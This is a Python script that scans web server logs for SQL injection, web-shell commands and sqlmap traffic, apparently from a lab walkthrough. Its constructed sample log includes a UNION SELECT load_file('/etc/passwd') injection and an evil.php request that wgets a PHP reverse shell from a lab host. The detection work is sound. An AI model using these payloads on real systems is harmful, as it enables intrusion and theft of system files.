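def classify(fields):
    """Detection tags that apply to one parsed request (empty list if clean)."""
    tags = []
    decoded = unquote_plus(fields["target"])
    for tag, rule in SQLI_RULES:
        if rule.search(decoded):
            tags.append(tag)
    query = urlsplit(fields["target"]).query  # parse_qs decodes each value itself
    for values in parse_qs(query, keep_blank_values=True).values():
        if any(CMD_RE.match(v) for v in values):
            tags.append("webshell.command_param")
            break
    if "sqlmap" in fields["ua"].lower():
        tags.append("scanner.sqlmap_ua")
    return tags


def scan(lines):
    """Return (client, path, tags) for every line that triggers at least one rule."""
    hits = []
    for line in lines:
        fields = parse_line(line)
        if fields is None:
            continue
        tags = classify(fields)
        if tags:
            hits.append((fields["host"], urlsplit(fields["target"]).path, tags))
    return hits


# Constructed sample, shaped like the requests made in the walkthrough.
SAMPLE_LOG = [
    '192.168.56.101 - - [14/Nov/2013:13:50:01 +0100] "GET /index.php?option=com_content'
    '&view=article&id=3 HTTP/1.1" 200 6204 "-" "Mozilla/5.0"',
    '192.168.56.101 - - [14/Nov/2013:13:51:12 +0100] "GET /index.php?option=com_abc&view=abc'
    '&letter=List+of+content+items...&Itemid=3 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '192.168.56.101 - - [14/Nov/2013:13:52:30 +0100] "GET /index.php?option=com_amblog&view=amblog'
    '&catid=-1%20UNION%20SELECT%20load_file%28%27/etc/passwd%27%29 HTTP/1.1" 200 7311 "-" "Mozilla/5.0"',
    '192.168.56.101 - - [14/Nov/2013:13:57:05 +0100] "GET /evil.php?c=wget%20-O%20phpreverse.php'
    '%20http://192.168.56.101/phpshells/phpreverse.txt HTTP/1.1" 200 231 "-" "Mozilla/5.0"',
    '192.168.56.101 - - [14/Nov/2013:13:57:40 +0100] "GET /images/logo.png HTTP/1.1" 304 180 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for host, path, tags in scan(SAMPLE_LOG):
        print(host, path, ", ".join(tags))
```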

Next step: Privilege escalation.
